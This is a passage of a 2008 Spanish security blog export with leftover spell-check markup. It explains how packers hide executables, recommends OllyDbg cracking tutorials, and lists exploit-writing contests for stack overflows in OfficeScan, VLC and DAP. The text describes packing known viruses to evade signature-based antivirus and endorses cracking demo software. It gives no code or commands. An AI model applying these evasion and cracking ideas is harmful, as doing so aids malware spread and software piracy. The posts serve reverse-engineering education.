id="SPELLING_ERROR_33">ingeniería</span> inversa del .<span class="blsp-spelling-error" id="SPELLING_ERROR_34">exe</span> original para poder encontrar el salto condicional que convierte la <span class="blsp-spelling-error" id="SPELLING_ERROR_35">demo</span> en <span class="blsp-spelling-error" id="SPELLING_ERROR_36">full</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_37">version</span>. Ya que aunque consigas <span class="blsp-spelling-error" id="SPELLING_ERROR_38">parchearlo</span>, lo <span class="blsp-spelling-corrected" id="SPELLING_ERROR_39">harás</span> sobre la memoria, no sobre el fichero original ya que la <span class="blsp-spelling-corrected" id="SPELLING_ERROR_40">versión</span> original esta <span class="blsp-spelling-error" id="SPELLING_ERROR_41">ecncriptada</span>.<br /><br />El <span class="blsp-spelling-error" id="SPELLING_ERROR_42">cracking</span> en si, se basa mas en romper la <span class="blsp-spelling-corrected" id="SPELLING_ERROR_43">protección</span> que aporta este empaquetador, estudiando su funcionamiento y programando <span class="blsp-spelling-error" id="SPELLING_ERROR_44">anti</span>-empaquetador que reconstruye el .<span class="blsp-spelling-error" id="SPELLING_ERROR_45">exe</span> original, que en modificar el original para que se convierte de <span class="blsp-spelling-error" id="SPELLING_ERROR_46">demo</span> a <span class="blsp-spelling-error" id="SPELLING_ERROR_47">full</span> <span class="blsp-spelling-corrected" id="SPELLING_ERROR_48">versión</span>.<br /><br /><span style="font-weight: bold;">¿Y que tiene que ver esto con los virus?</span> Sencillo, tu no sabes como hacer un virus pero tienes alguno que funciona bastante bien, <span class="blsp-spelling-error" id="SPELLING_ERROR_49">famosisimo</span> y es detectado por cualquier <span class="blsp-spelling-error" id="SPELLING_ERROR_50">antivirus</span>. ¿Que haces? Consigues <span class="blsp-spelling-corrected" id="SPELLING_ERROR_51">algún</span> empaquetador que "proteja" tu <span class="blsp-spelling-corrected" id="SPELLING_ERROR_52">espécimen</span> y como lo <span class="blsp-spelling-error" id="SPELLING_ERROR_53">encripta</span>/codifica y los <span class="blsp-spelling-error" id="SPELLING_ERROR_54">Antivirus</span> funcionan por firmas, no <span class="blsp-spelling-corrected" id="SPELLING_ERROR_55">serán</span> detectados por los <span class="blsp-spelling-error" id="SPELLING_ERROR_56">AVs</span>.<br /><br /><span class="blsp-spelling-corrected" id="SPELLING_ERROR_57">Aquí</span> viene la parte de Analizar Virus. Por lo explicado anteriormente, al que le gusten los virus y quieren saber como funcionan (el caso de un servidor), es de vital importancia saber desempaquetar cualquier ejecutable.<br /><br />Por ultimo quiero decir que hablo de los programas que te descargas en <span class="blsp-spelling-error" id="SPELLING_ERROR_58">demo</span> pero que al poner un <span class="blsp-spelling-error" id="SPELLING_ERROR_59">serial</span> correcto se <span class="blsp-spelling-error" id="SPELLING_ERROR_60">desbloque</span> a <span class="blsp-spelling-error" id="SPELLING_ERROR_61">full</span> <span class="blsp-spelling-corrected" id="SPELLING_ERROR_62">versión</span>. <span class="blsp-spelling-corrected" id="SPELLING_ERROR_63">Obviamente</span> si a la <span class="blsp-spelling-error" id="SPELLING_ERROR_64">demo</span> le faltan las <span class="blsp-spelling-corrected" id="SPELLING_ERROR_65">librerías</span> de la <span class="blsp-spelling-error" id="SPELLING_ERROR_66">full</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_67">version</span> y para descargarlas debes de introducir el <span class="blsp-spelling-error" id="SPELLING_ERROR_68">serial</span> en la pagina <span class="blsp-spelling-error" id="SPELLING_ERROR_69">web</span>, o dichas <span class="blsp-spelling-corrected" id="SPELLING_ERROR_70">librerías</span> <span class="blsp-spelling-corrected" id="SPELLING_ERROR_71">están</span> <span class="blsp-spelling-error" id="SPELLING_ERROR_72">encriptadas</span>, pues no es posible <span class="blsp-spelling-error" id="SPELLING_ERROR_73">crackear</span> algo que no tienes. Aun <span class="blsp-spelling-corrected" id="SPELLING_ERROR_74">así</span>, <span class="blsp-spelling-corrected" id="SPELLING_ERROR_75">habría</span> que ver como se le engaña a la <span class="blsp-spelling-error" id="SPELLING_ERROR_76">web</span>.... <span class="blsp-spelling-error" id="SPELLING_ERROR_77">jejeje</span>.<br /><br />Espero haya sido esclarecedor.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com0tag:blogger.com,1999:blog-647648746783162534.post-82326026574866102142008-07-30T10:00:00.000-07:002008-08-13T06:32:27.096-07:00Ingenieria Inversa y CrackSLatinoSLa <a href="http://es.wikipedia.org/wiki/Ingenier%C3%ADa_inversa">ingeniería inversa</a> en el mundo de la seguridad informática es de vital importancia, poder llegar de la vulnerabilidad al exploit es algo que marca la diferencia entre los que saben que se puede entrar en los sistemas, a los que entran en los sistemas.<br /><br />Hay muy buenos sitios web, donde publican exploits totalmente funcionales pero que sabiendo lo justo es imposible hacerlos funcionar, o por lo menos hacer que hagan algo diferente a abrir la calculadora.<br /><br />Esto y el hecho de que siempre me ha interesado el lenguaje ensamblador, son los motivos por los que decidí aprender a usar el OllyDbg, un depurador muy potente que se usa para depurar los programas en Windows.<br /><br />Pero si uno se pone a depurar una librería donde supuestamente hay un fallo, sin ninguna experiencia, te puedes volver loco, además de no conseguir NADA.<br /><br />Esto me llevo a buscar tutoriales sobre el uso de OllyDbg y San Google me mostró la luz: <a href="http://ricardonarvaja.info/WEB/INTRODUCCION%20AL%20CRACKING%20CON%20OLLYDBG%20DESDE%20CERO/">Introducción al cracking con OllyDbg desde cero</a> Si, cracking. El arte de desproteger los programas y/o modificarlos para poder usarlos sin limitaciones.<br /><br />No es que tuviera especial interés en romper las protecciones de software, pero esto me iba a ayudar a aprender mas ensamblador y a utilizar el preciado OllyDbg.<br /><br /><a href="http://www.ricardonarvaja.info/">Ricardo Narvaja</a>, su autor y fundador de la lista CrackSLatinoS, ha elaborado cientos de documentos explicando todo clarito y al detalle. Además propone mensualmente concursos con varios puntos a realizar, donde cada uno según su nivel, puede ir abordando. La única condición para puntuar, es que se debe hacer un tutorial para que quien no lo haya conseguido, aprenda a hacerlo.<br />Estos concursos llevan años haciéndolos, por lo que hay mas de mil tutoriales con las soluciones o con temas que cada uno ha visto oportuno escribir por su cuenta. Puedes verlo <a href="http://ricardonarvaja.info/WEB/">aquí</a>.<br /><br />Casualidad que tanto Ricardo como otros miembros de la lista, actualmente trabajan como Exploit Writer, y eso ha favorecido que se introdujera un apartado en los concursos mensuales, en los que hay que hacer un exploit para una bug reciente en un software que elige Ricardo.<br /><br />Ya llevo con este mi cuarto concurso, podéis consultar mis soluciones y las del resto de la lista en los siguientes enlaces:<br /><a href="http://ricardonarvaja.info/WEB/CONCURSOS%202008/CONCURSO%203/">Concurso 3</a> (Ejercicios básicos varios sobre Buffer Overflow, ideal para principiantes)<br /><a href="http://ricardonarvaja.info/WEB/CONCURSOS%202008/CONCURSO%204/">Concurso 4</a> Desbordamiento de pila en el suite antivirus OfficeScan<br /><a href="http://ricardonarvaja.info/WEB/CONCURSOS%202008/CONCURSO%205/">Concurso 5</a> Desbordamiento de pila en el reproductor multimedia VLC<br /><a href="http://ricardonarvaja.info/WEB/CONCURSOS%202008/CONCURSO%206/">Concurso 6</a> Desbordamiento de pila en el gestor de descargas DAP al que se le ha agregado una solución alternativa en la que se desactive el <a href="http://www.genbeta.com/2006/05/29-dep-proteccion-de-memoria-en-windows-xp-sp2-y-vista">DEP</a> para poder ejecutar código.<br /><br />La participación en la lista es muy alta, no hay duda que se quede sin contestar en menos de 10h.<br /><br />A todo al que le interese comprender el funcionamiento de los exploits y/o hacer los suyos propios, le recomiendo que se subscriba a la lista, y pruebe con los concursos.<br /><br />Espero no haberos aburrido y que haya sido de interés.<br />Saludos.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com9tag:blogger.com,1999:blog-647648746783162534.post-43372052534693037802008-07-26T03:52:00.000-07:002008-07-26T04:44:36.910-07:00BienvenidosHola a todos.<br /><br />Este es mi primer Blog. Aunque hace muchas años que mi amigo <a href="http://blogs.idominiun.com/ciberpensantes/"><span class="blsp-spelling-error" id="SPELLING_ERROR_0">Athathel</span></a> (hecho por él) lleva en este mundo y lo he podido vivir muy de cerca, pero nunca he visto la necesidad de tener uno.<br /><br /><span class="blsp-spelling-error" id="SPELLING_ERROR_1">Ultimamente</span>, le estoy viendo la parte practica y es la de plasmar en un sitio todas las cosas que voy aprendiendo y poder compartir con todo a el que le interese, las cosas que gracias a lo que leo, pregunto o veo, aprendo sobre este mundo de la Seguridad <span class="blsp-spelling-corrected" id="SPELLING_ERROR_2">Informática</span>.<br /><br />A mi me sirve de cuaderno de <span class="blsp-spelling-corrected" id="SPELLING_ERROR_3">bitácoras</span> donde almacenar todos mis "conocimientos" y al que lo visite le puede servir en momentos puntuales para hacer lo que a mi me ha podido costar mas o menos tiempo.<br /><br />Ante todo espero que os sea <span class="blsp-spelling-corrected" id="SPELLING_ERROR_4">útil</span><br />Saludos.Bokenhttp://www.blogger.com/profile/13008727550075774684noreply@blogger.com3